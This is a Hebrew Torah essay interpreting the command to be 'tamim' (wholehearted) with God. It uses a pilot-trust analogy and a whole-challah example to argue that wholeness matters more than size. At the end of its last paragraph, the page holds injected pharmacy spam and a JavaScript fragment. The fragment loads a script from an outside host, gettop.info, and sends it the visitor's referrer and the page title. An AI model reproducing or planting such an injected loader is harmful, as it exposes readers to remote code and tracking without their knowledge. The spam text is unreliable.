אימון או אמונה

בס”ד                                                אימון או אמונה/מרדכי אפרתי

למה התורה מתכוונת כאשר היא מצווה אותנו “תמים תהיה עם ….. אלוקיך” ?

הרבה מאיתנו טסים במטוס ולעיתים לטיסות ארוכות ומורכבות. כאשר אנו עולים למטוס ומתישבים בבטחה במושבים איש מאיתנו לא הולך לבדוק מיהו הטייס. האם זו הפעם הראשונה שהוא מטיס מטוס ? האם עבר את קורס טייס בהצלחה או רק עבר את הקורס בקושי ? האם הוא צלול במחשבתו או שהוא קצת שתוי ?   איננו בודקים את הטייס כיון שאנו נותנים בו “אימון”. אנו לא רק מאמינים שהוא בסדר מכל הבחינות החשובות להטיס מטוס אלא לנו בו אימון מוחלט שהוא עושה הכי טוב והכי נכון.

המילה “אמונה” מבוססת על המילה “אימון” . לא מספיק להאמין שאלוקים ברא את העולם והוא כל יכול אלא צריך להאמין שכל מה שהוא עושה זה רק לטובה גם אם אנו לא רואים זאת כרגע. במילים אחרות עלינו לתת בו “אימון” וכשם שאיננו “בודקים” את הטייס כך לא נבדוק ונחקור “מה יהיה” אלא נאמין בקב”ה שהוא טוב ומוביל את הכל לטוב. כך מסביר רש”י את הציווי “תמים תהיה עם ….אלוקיך”.

מאידך, יש מפרשים את המילה “תמים” במובן של המילה “שלם” (כך תרגם אונקלוס “שלים”). כלומר התורה מצוה את האדם להיות “שלם” עם אלוקיו.

למה הכוונה להיות “שלם” עם אלוקים ?

אפשר לומר , ברוח הדברים הקודמים כי הכוונה היא  להיות “שלם” עם מה שהקב”ה עושה. להשלים עם מה שקרה, לקבל את המציאות ולא להתנגד אליה מבחינה נפשית אלא להשלים איתה , לזרום הלאה , לא להיות כל הזמן בצער נפשי “למה זה קרה לי” אלא להבין שהדבר כבר קרה וגם זה כרגע הוא רצון אלוקים וזו המציאות שהוא רוצה שאני אחווה עכשיו .    מצד שני ניתן לומר “שלם” תהיה עם אלוקיך פירושו הוא להיות אדם “שלם” ולא אדם “חלקי” כלומר להשתדל לעשות את מה שמוטל עלי בעבודת האלוקים בשלימות ולא  בחלקיות. פירושו של דבר לעשות מצוה “עד הסוף” ובשלימות ולא רק “דונם פה ודונם שם”, לעשות מעשה טוב ולסיים אותו ולא רק להתחיל אותו מבלי לסיים.

לפעמים אנו מעדיפים לעשות רק חלק מהמצוות ולעשות אותן “בגדול” אבל בה בשעה אנו מזניחים מצוות אחרות ולא מקיימים אותם ונמצא שעשינו “בגדול” אבל לא עשינו “בשלימות”. חלות השבת מלמדות אותנו ש “שלם” עדיף על “גדול”. עדיף לברך על חלה קטנה אבל “שלמה” מאשר לברך על חלה “גדולה” אבל חסרה .synthyroid without a prescriptions.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

סגור לתגובות.

Scroll To Top